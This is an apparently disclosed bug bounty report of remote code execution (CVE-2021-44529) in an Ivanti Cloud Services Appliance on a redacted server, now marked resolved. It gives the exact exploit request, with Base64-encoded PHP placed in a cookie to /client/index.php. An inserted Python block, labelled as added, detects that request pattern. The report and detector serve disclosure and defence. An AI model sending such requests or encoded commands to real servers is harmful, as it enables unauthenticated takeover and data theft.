[███████] Remote Code Execution at ██████ [CVE-2021-44529] [HtUS]
Critical
Vulnerability Details
**IP Address used to find vulnerability:**
`██████`
**Vulnerable Website URL or Application:**
`https://████`
`pomcldsvr2.████`
**Proof of ownership:**
███
**Summary:**
The server at `https://███` is running a vulnerable version of CSA.
A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
**Steps to Reproduce:**
Use Burp Repeater to send the following GET requests:
*Please note that for the system commands to run, they need to be Base64 encoded. For example, for phpinfo, pass `cGhwaW5mbygpOw==`.*
- For phpinfo()
````
GET /client/index.php HTTP/1.1
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;
Accept-Encoding: gzip, deflate
````
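A defender-side check for the request pattern above, as an added example that is not part of the original report: it flags requests to `/client/index.php` whose `c` cookie strictly Base64-decodes to printable text that looks like a code statement. The host name, the benign sample and the code-shape heuristic are assumptions constructed for illustration.

```python
import base64
import binascii
import re

TARGET_PATH = "/client/index.php"  # endpoint named in the report
# Heuristic (assumption): decoded text containing a function call ending in ';'
CODE_HINT = re.compile(r"[A-Za-z_]\w*\s*\(.*\)\s*;")

# Constructed samples; the Host value is a placeholder for the redacted one.
REPORTED = ("GET /client/index.php HTTP/1.1\r\nHost: csa.example.test\r\n"
            "Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\r\n\r\n")
BENIGN = ("GET /client/index.php HTTP/1.1\r\nHost: csa.example.test\r\n"
          "Cookie: ab=ab; c=abcd; theme=dark-mode\r\n\r\n")

def parse_request(raw):
    """Return (path, headers) from a raw HTTP request head."""
    lines = raw.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return target.split("?", 1)[0], headers

def parse_cookies(header):
    """Split a Cookie header into a name -> value dict."""
    jar = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name] = value
    return jar

def decode_b64_text(value):
    """Decoded text if value is strict Base64 of printable ASCII, else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None

def flag_request(raw):
    """Return the decoded 'c' cookie if the request matches the reported pattern."""
    path, headers = parse_request(raw)
    if path != TARGET_PATH:
        return None
    value = parse_cookies(headers.get("cookie", "")).get("c", "")
    text = decode_b64_text(value)
    return text if text and CODE_HINT.search(text) else None

if __name__ == "__main__":
    for name, req in (("reported", REPORTED), ("benign", BENIGN)):
        print(name, "->", flag_request(req))
```

Standard access logs rarely record cookies, so this check needs full request headers, for example from a reverse proxy or WAF capture.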
**Screenshots:**
█████████
█████████
██████
█████
██████
**References:**
- https://nvd.nist.gov/vuln/detail/CVE-2021-44529
- https://forums.ivanti.com/s/article/SA-2021-12-02
## Impact
**Impact:**
Remote attackers can execute arbitrary commands on the server, and compromise company and user data.
**CVSS Score: Critical**
**Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Report Stats
- Report ID: 1624172
- State: Closed
- Substate: resolved
- Upvotes: 28